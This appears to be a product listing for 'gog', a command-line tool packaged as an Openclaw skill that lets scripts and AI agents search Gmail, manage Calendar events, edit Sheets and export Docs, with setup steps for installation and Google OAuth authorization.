What is gog?

The gog skill provides a robust command-line interface for interacting with the Google Workspace ecosystem. It allows developers and AI agents to programmatically handle emails, manage calendar events, manipulate spreadsheets, and access documents without needing a browser. By integrating this tool with Openclaw Skills, users can bridge the gap between their local terminal environments and the cloud-based Google productivity suite.

This skill is particularly valuable for building automated workflows that require real-time access to Google services. Whether you are searching for specific threads in Gmail, syncing data into Google Sheets, or fetching document content for AI processing, gog offers a streamlined and scriptable path to Google APIs.

gog Use Cases

  • Searching for specific emails or attachments within Gmail for context gathering.
  • Automating calendar event retrieval and management for daily scheduling tasks.
  • Programmatically updating Google Sheets with data from local scripts or external APIs.
  • Exporting Google Docs to local text files for analysis or conversion.
  • Searching and listing Google Drive files or Google Contacts directly from the terminal.

How gog Works

  1. Install the gog binary and ensure the OpenClawProvider is running on your system.
  2. Provide your Google Cloud Platform client credentials to the tool for OAuth authentication.
  3. Add and authorize your Gmail account for specific services like Gmail, Calendar, or Drive.
  4. Execute specialized commands to query, update, or append data across the Google Workspace.
  5. Capture structured output in JSON format to feed into other Openclaw Skills or automation pipelines.

gog Setup

First, ensure OpenClawProvider is installed. Then, install the gog CLI:

brew install steipete/tap/gogcli

To configure the skill, you must perform a one-time OAuth setup:

gog auth credentials /path/to/client_secret.json
gog auth add [email protected] --services gmail, calendar, drive, contacts, sheets, docs
gog auth list

gog Data Schema & Taxonomy

The skill manages data across different Google services with specific structures:

Service Data Type Key Attributes
Gmail Search Results Thread ID, Subject, Date, Snippet
Sheets Grid Data Tab names, Range (A1:Z100), Value Arrays
Calendar Events Event ID, Start/End Time, Summary
Docs Document Content Plain text or exported formats (txt)
Drive Files File ID, Name, MimeType, Search Query

gog Advanced Features

  • Support for environment variables like GOG_ACCOUNT to manage multiple identities without repetitive flags.
  • Script-friendly output using the --json flag for seamless integration with Openclaw Skills pipelines.
  • Headless execution mode using the --no-input flag for server-side or non-interactive automation.
  • Granular service authorization allowing users to restrict access to specific Google APIs.
